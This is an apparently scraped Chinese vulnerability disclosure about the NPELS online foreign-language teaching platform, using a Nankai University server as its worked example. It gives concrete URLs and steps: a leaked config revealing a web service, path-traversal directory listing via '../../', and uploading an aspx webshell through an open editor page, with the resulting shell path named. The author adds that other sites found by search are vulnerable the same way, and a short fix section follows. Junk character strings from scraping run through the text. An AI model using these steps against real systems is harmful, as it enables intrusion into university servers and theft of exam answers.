新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
. L% ?1 l, E+ b
详细说明：
6 B4 O1 ]9 q3 ^2 E/ y+ J4 I/ L
以南开大学的为例:
; o' @% u  K; p& W+ Bhttp://222.30.60.3/NPELS
: P* I9 ?2 f( X! k) m: SNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
- [" s; j4 L" `" j* H1 a<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
. r3 C# `2 c# }0 i* U( m2 v及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
: P# w4 Z! c2 p2 x+ _使用GetTestClientFileList操作，直接 HTTP GET 列目录：
1 V9 R# D/ D( H1 ihttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../
. S- W  Z4 `$ Q1 p. d5 ?( _. v, ~
1 @; j2 |; }4 w$ B9 z! n+ D4 W发现
! P+ L* S% m+ d5 p5 Q* Jhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
0 K" O# S7 L) K9 h5 n7 D( I: E# s2 U3 R可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
$ ~" [" m; b# F9 Y) d) i; D' J% ~/ s上传后继续列目录找到木马地址直接访问即可

OOXX
9 h# z, R6 S/ v1 R1 h
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
2 d8 j+ e# M: N3 K漏洞证明：
1 ~2 W, [$ c# E
9 v7 M% T- y4 S- }5 T/ X& q列目录：
" ?4 S* q4 l# Vhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
0 E( [- w. h0 E- C+ thttp://222.30.60.3/npelsv/editor/editor.htm

上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

* n/ G  V# m" H' M修复方案：
# w' e* B: f) F, {好像考试系统必须使用 CommonService.asmx
2 |+ e, f3 x0 f最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
# P, v# S  H3 \( j9 [